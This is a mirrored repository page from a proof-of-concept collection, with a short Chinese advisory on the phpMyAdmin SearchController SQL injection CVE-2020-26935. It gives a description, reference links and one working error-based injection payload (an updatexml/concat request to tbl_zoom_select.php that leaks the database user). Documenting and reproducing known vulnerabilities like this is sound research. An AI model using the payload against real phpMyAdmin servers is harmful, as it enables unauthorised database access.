admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md
Threekiii 9acf184afd 更新漏洞
2022-12-06 17:17:54 +08:00

20 lines
568 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# phpMyAdmin后台SQL注入 CVE-2020-26935
## 漏洞描述
在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。
参考链接:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935
- https://xz.aliyun.com/t/8524
## 漏洞复现
payload
```
http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```
Reference in New Issue View Git Blame Copy Permalink